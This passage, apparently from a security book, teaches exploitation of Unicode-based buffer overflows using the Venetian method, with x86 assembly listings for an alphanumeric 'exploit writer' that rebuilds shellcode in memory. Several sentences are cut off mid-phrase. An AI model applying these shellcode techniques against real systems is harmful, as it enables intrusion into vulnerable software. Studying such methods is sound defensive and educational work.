In order to exploit a Unicode-based buffer overflow, we first need a mechanism to transfer the process's
0x007700FF inc ecx
0x00770100 push ecx
0x00770101 call ebx
We'd overwrite the saved return address/exception handler with 0x007700FF, and execution would transfer to this address. When execution takes up at this point, the ECX register is incremented by 1 and
Assuming you do find a way to return to the user-supplied buffer, the
When exploiting a Unicode-based vulnerability, the arbitrary code executed must be of a form in which every second byte is a null and the others are non-null. This leaves you with a limited set of instructions. Available to the Unicode exploit developer are all the single-byte operations, including instructions such as push, pop, inc, and dec. Also available are instructions with a byte form of nn00nn, such as:
imul eax, dword ptr[eax],0x00nn
Alternatively, you may find nn00nn00nn, such as:
imul eax, dword ptr[eax],0x00nn00nn
Or, you could find many add-based instructions of the form 00nn00. Two single-byte instructions often need to be used one after the other, as in this code fragment:
00401066 50 push eax
00401067 59 pop ecx
The instructions must be separated with a nop-equivalent of the form 00 nn 00 to make the sequence Unicode in nature. One such choice could be:
00401067 00 6D 00 add byte ptr [ebp],ch
Of course, for this method to succeed, the address pointed to by EBP must be writable. If it isn't, choose another; we've listed many more later in this section. When embedded between the push and the pop we get:
00401066 50 push eax
00401067 00 6D 00 add byte ptr [ebp],ch
0040106A 59 pop ecx
These are Unicode in nature:
\x50\x00\x6D\x00\x59
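The "Unicode in nature" constraint is easy to check mechanically. The following is a minimal Python sketch, not part of the original text; the function name `is_unicode_in_nature` is hypothetical. It tests that bytes at even offsets are non-null and bytes at odd offsets are null, and it shows that the three ASCII characters `PmY`, once widened to UTF-16LE, begin with the five bytes shown above.

```python
def is_unicode_in_nature(code: bytes) -> bool:
    """Return True if even-offset bytes are non-null and odd-offset bytes are null."""
    return all(
        (b != 0) if offset % 2 == 0 else (b == 0)
        for offset, b in enumerate(code)
    )


# push eax / add byte ptr [ebp],ch / pop ecx, as listed in the text
fragment = bytes.fromhex("50 00 6D 00 59")
print(is_unicode_in_nature(fragment))

# push eax immediately followed by pop ecx breaks the pattern
print(is_unicode_in_nature(bytes.fromhex("50 59")))

# The same bytes fall out of widening the ASCII string "PmY"
widened = "PmY".encode("utf-16-le")
print(widened.hex(" "))
```

The widened string carries one extra trailing null, which simply becomes the first byte of whatever instruction follows.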
Writing a full-featured exploit using such a limited instruction set is extremely difficult, to say the least. So what can be done to make the task easier? Well, you could use the limited set of available instructions to create the real exploit code on the fly, as is done using the Venetian technique described in Chris Anley's paper. This method
Let's look at an example. Before the exploit writer begins executing, the destination buffer could be:
\x41\x00\x43\x00\x45\x00\x47\x00
When the exploit writer starts, it replaces the first null with 0x42 to give us
\x41\x42\x43\x00\x45\x00\x47\x00
The
\x41\x42\x43\x44\x45\x00\x47\x00
The process is repeated until the final full-featured "real" exploit remains.
\x41\x42\x43\x44\x45\x46\x47\x48
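The closing of the blinds can be simulated in a few lines. This is an illustrative Python sketch under the assumption that every null byte sits at an odd offset of the destination buffer; `venetian_fill` is a hypothetical helper name, and the addition mirrors what an `add byte ptr [reg],value` instruction would do to each null byte.

```python
def venetian_fill(buffer: bytearray, fill: bytes) -> list:
    """Add each fill byte to successive null bytes, recording every stage."""
    stages = [bytes(buffer)]
    position = 1  # offset of the first null byte
    for value in fill:
        # Equivalent of: add byte ptr [reg], value
        buffer[position] = (buffer[position] + value) & 0xFF
        position += 2  # skip the non-null byte that follows
        stages.append(bytes(buffer))
    return stages


destination = bytearray(b"\x41\x00\x43\x00\x45\x00\x47\x00")
stages = venetian_fill(destination, b"\x42\x44\x46\x48")
for stage in stages:
    print(stage.hex(" "))
```

Each printed line corresponds to one of the buffer states shown above, from the half-filled buffer to the complete one.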
As you can see, it's much like Venetian blinds closing, hence the
To set each null byte to its appropriate value, the exploit writer needs at least one register that points to the first null byte of the half-filled buffer when it starts its work. Assuming EAX points to the first null byte, it can be set with the following instruction:
00401066 80 00 42 add byte ptr [eax],42h
Adding 0x42 to 0x00, needless to say, gives us 0x42. EAX then must be incremented twice to point to the next null byte; then it too can be filled. But remember, the exploit writer part of the exploit code needs to be Unicode in nature, so it should be
00401066 80 00 42 add byte ptr [eax],42h
00401069 00 6D 00 add byte ptr [ebp],ch
0040106C 40 inc eax
0040106D 00 6D 00 add byte ptr [ebp],ch
00401070 40 inc eax
00401071 00 6D 00 add byte ptr [ebp],ch
This is 14 bytes (7 wide characters) of instruction and 2 bytes (1 wide character) of storage, which makes 16 bytes (8 wide
Although Chris's code is small (relatively speaking), which is a benefit, the problem is that one of the bytes of code has a value of 0x80. If the exploit is first sent as an ASCII-based string and then converted to Unicode by the vulnerable process, depending on the code page in use during the conversion routine, this byte may get mangled. In addition, when replacing a null byte with a value greater than 0x7F, the same problem creeps in: the exploit code may get mangled and thus fail to work. To solve this we need to create an exploit writer that uses only characters 0x20 to 0x7F. An even better solution would be to use only
Our task is to develop a Unicode-type exploit that, using the Venetian Method, creates arbitrary code on the fly using only ASCII letters and numbers from the Roman alphabet: a Roman Exploit Writer, if you will. We have several
0040B55E 6A 00 push 0
0040B560 5B pop ebx
0040B564 43 inc ebx
0040B568 53 push ebx
0040B56C 54 push esp
0040B570 58 pop eax
0040B574 6B 00 39 imul eax,dword ptr [eax],39h
0040B57A 50 push eax
0040B57E 5A pop edx
0040B582 54 push esp
0040B586 58 pop eax
0040B58A 6B 00 69 imul eax,dword ptr [eax],69h
0040B590 50 push eax
0040B594 5B pop ebx
Assuming ECX already contains the pointer to the first null byte (and we'll deal with this aspect later), this piece of code starts by pushing 0x00000000 onto the top of the stack, which is then popped off into the EBX register. EBX now holds the value 0x00000000. We then increment EBX by 1 and push this onto the stack. Next, we push the address of the top of the stack onto the top, then pop it into EAX. EAX now holds the memory address of the 1. We now multiply the 1 by 0x39 to give 0x39, and the result is stored in EAX. This is then
We then push the address of the 1 onto the top of the stack again with the push esp instruction, and again pop it into EAX. EAX contains the memory address of the 1 again. We multiply this 1 by 0x69, leaving this result in EAX. We then push the result onto the stack and pop it into EBX. EBX/BL now contains the value 0x69. Both BL and DL will come into play later when we need to write out a byte with a value greater than 0x7F.
Moving on to the code that forms the implementation of the Venetian Method, and again with the nop-equivalents removed for clarity, we have:
0040B5BA 54 push esp
0040B5BE 58 pop eax
0040B5C2 6B 00 41 imul eax,dword ptr [eax],41h
0040B5C5 00 41 00 add byte ptr [ecx],al
0040B5C8 41 inc ecx
0040B5CC 41 inc ecx
Remembering that we have the value 0x00000001 at the top of the stack, we push the address of the 1 onto the stack. We then pop this into EAX, so EAX now contains the address of the 1. Using the imul operation, we multiply this 1 by the value we want to write out, in this case 0x41. EAX now holds 0x00000041, and thus AL holds 0x41. We add this to the byte pointed to by ECX. Remember that this is a null byte, so when we add 0x41 to 0x00 we're left with 0x41, thus closing the first "blind." We then increment ECX twice to point to the next null byte, skipping the non-null byte, and repeat the process until the full code is written out.
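Because every non-null byte in this sequence is an ordinary ASCII letter, the whole writer step can be expressed as a short string that the conversion to wide characters expands into the listing above. The Python sketch below is illustrative only. It assumes the three-byte gaps between the addresses in the listing are filled with the `00 6D 00` nop-equivalent used earlier in this section, and `writer_for_printable` is a hypothetical helper name.

```python
NOP = "m"  # 0x6D; between neighbouring nulls it forms 00 6D 00 (add byte ptr [ebp],ch)


def writer_for_printable(value: int) -> str:
    """ASCII string that widens to the code writing one byte in 0x20..0x7F."""
    if not 0x20 <= value <= 0x7F:
        raise ValueError("value must be in the range 0x20 to 0x7F")
    return (
        "T" + NOP            # 54        push esp, then nop-equivalent
        + "X" + NOP          # 58        pop eax, then nop-equivalent
        + "k" + chr(value)   # 6B 00 vv  imul eax,dword ptr [eax],vv
        + "A"                # 00 41 00  add byte ptr [ecx],al
        + "A" + NOP          # 41        inc ecx, then nop-equivalent
        + "A" + NOP          # 41        inc ecx, then nop-equivalent
    )


ascii_form = writer_for_printable(0x41)
wide_form = ascii_form.encode("utf-16-le")
print(ascii_form)
print(wide_form.hex(" "))
```

For 0x41 the ASCII form consists solely of letters, which is the property the Roman Exploit Writer relies on.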
Now what happens if you need to write out a byte with a value greater than 0x7F? Well, this is where BL and DL come into play. What follows are a few variations on the above code that deal with this situation.
Assuming the null byte in question should be replaced with a byte in the range of 0x7F to 0xAF, for example 0x94 (xchg eax,esp), we would use the following code:
0040B5BA 54 push esp
0040B5BE 58 pop eax
0040B5C2 6B 00 5B imul eax,dword ptr [eax],5Bh
0040B5C5 00 41 00 add byte ptr [ecx],al
0040B5C8 46 inc esi
0040B5C9 00 51 00 add byte ptr [ecx],dl // <---- HERE
0040B5CC 41 inc ecx
0040B5D0 41 inc ecx
Notice what is going on here. We first write out the value 0x5B to the null byte and then add the value in DL, 0x39, to it. 0x39 plus 0x5B is 0x94. Incidentally, we insert an INC ESI as a nop-equivalent to avoid incrementing ECX too early and adding 0x39 to one of the non-null bytes.
If the null byte to be replaced should have a value in the range of 0xAF to 0xFF, for example 0xC3 (ret), use the following code:
0040B5BA 54 push esp
0040B5BE 58 pop eax
0040B5C2 6B 00 5A imul eax,dword ptr [eax],5Ah
0040B5C5 00 41 00 add byte ptr [ecx],al
0040B5C8 46 inc esi
0040B5C9 00 59 00 add byte ptr [ecx],bl // <---- HERE
0040B5CC 41 inc ecx
0040B5D0 41 inc ecx
In this case, we're doing the same thing, this time using BL to add 0x69 to the byte pointed to by ECX, which has just been set to 0x5A. 0x5A plus 0x69 equals 0xC3, and thus we have written out our ret instruction.
What if we need a value in the range of 0x00 to 0x20? In this case, we simply overflow the byte. Assuming we want the null byte replaced with 0x06 (push es), we'd use this code:
0040B5BA 54 push esp
0040B5BE 58 pop eax
0040B5C2 6B 00 64 imul eax,dword ptr [eax],64h
0040B5C5 00 41 00 add byte ptr [ecx],al
0040B5C8 46 inc esi
0040B5C9 00 59 00 add byte ptr [ecx],bl // <--- BL == 0x69
0040B5CC 46 inc esi
0040B5CD 00 51 00 add byte ptr [ecx],dl // <--- DL == 0x39
0040B5D0 41 inc ecx
0040B5D4 41 inc ecx
0x64 plus 0x69 plus 0x39 equals 0x106. But a byte can only hold a maximum value of 0xFF, and so the byte "overflows," leaving 0x06.
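The arithmetic behind these variations can be summarized as a small planner. The Python sketch below is an illustration under stated assumptions, not the authors' tool: DL holds 0x39 and BL holds 0x69 as set up earlier, the imul immediate must fall in the range 0x20 to 0x7F, and `plan_byte` is a hypothetical name. It tries the cheapest combination first and relies on the byte wrapping around modulo 0x100.

```python
DL = 0x39  # value left in DL by the setup code
BL = 0x69  # value left in BL by the setup code


def plan_byte(target: int):
    """Return (immediate, add_dl, add_bl) that produces the target byte."""
    # Try no adjustment first, then DL, then BL, then both.
    for add_dl, add_bl in ((False, False), (True, False), (False, True), (True, True)):
        immediate = (target - DL * add_dl - BL * add_bl) & 0xFF
        if 0x20 <= immediate <= 0x7F:
            return immediate, add_dl, add_bl
    raise ValueError("no combination reaches this byte")


for wanted in (0x41, 0x94, 0xC3, 0x06):
    immediate, add_dl, add_bl = plan_byte(wanted)
    print(f"{wanted:#04x}: imul immediate {immediate:#04x}, add dl={add_dl}, add bl={add_bl}")
```

With these two constants, every value from 0x00 to 0xFF has at least one workable combination, so the planner never raises for a valid byte. Restricting the immediate further to letters and digits only would need an extra check that this sketch does not perform.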
This method can also be used to adjust non-null bytes if they're not in the range 0x20 to 0x7F. What's more, we can be efficient and do something useful with one of the nop-equivalents by replacing it with an instruction that does real work. Assuming, for example, that the non-null byte should be 0xC3 (ret), initially we would set it to 0x5A. While setting the null byte that precedes this non-null byte, and before executing the second inc ecx, we could adjust it as follows:
0040B5BA 54 push esp
0040B5BE 58 pop eax
0040B5C2 6B 00 41 imul eax,dword ptr [eax],41h
0040B5C5 00 41 00 add byte ptr [ecx],al
0040B5C8 41 inc ecx // NOW ECX POINTS TO THE 0x5A IN THE DESTINATION BUFFER
0040B5C9 00 59 00 add byte ptr [ecx],bl // <-- BL == 0x69 NON-null BYTE NOW EQUALS 0xC3
0040B5CC 41 inc ecx
0040B5CD 00 6D 00 add byte ptr [ebp],ch
We repeat these actions until our code is complete. We're left then with the question: What code do we really want to execute?